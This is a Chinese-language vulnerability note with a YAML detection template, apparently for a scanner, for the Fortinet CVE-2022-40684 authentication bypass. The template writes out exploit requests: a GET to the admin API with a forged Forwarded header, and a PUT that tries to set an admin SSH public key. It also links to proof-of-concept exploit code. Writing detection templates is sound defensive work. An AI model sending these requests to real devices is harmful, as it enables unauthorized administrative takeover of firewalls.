漏洞描述
Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例
title="FortiProxy"
id: CVE-2022-40684
info:
name: Fortinet FortiOS admin 远程命令执行漏洞
author: Shockwave,nagli,carlosvieira
severity: critical
description: |
Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例
title="FortiProxy"
reference:
- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
- http://wiki.peiqi.tech/wiki/iot/Fortinet/Fortinet%20FortiOS%20admin%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-40684.html
rules:
r0:
request:
method: GET
path: /api/v2/cmdb/system/admin
headers:
User-Agent: Node.js
Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
X-Forwarded-Vdom: root
expression: response.body.bcontains(b'ENC XXXX') && response.body.bcontains(b'http_method')
r1:
request:
method: PUT
path: /api/v2/cmdb/system/admin/admin
headers:
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
body: |
{
"ssh-public-key1":"123"
}
expression: response.body.bcontains(b'Invalid SSH public key.') && response.body.bcontains(b'cli_error')
expression: r0() || r1()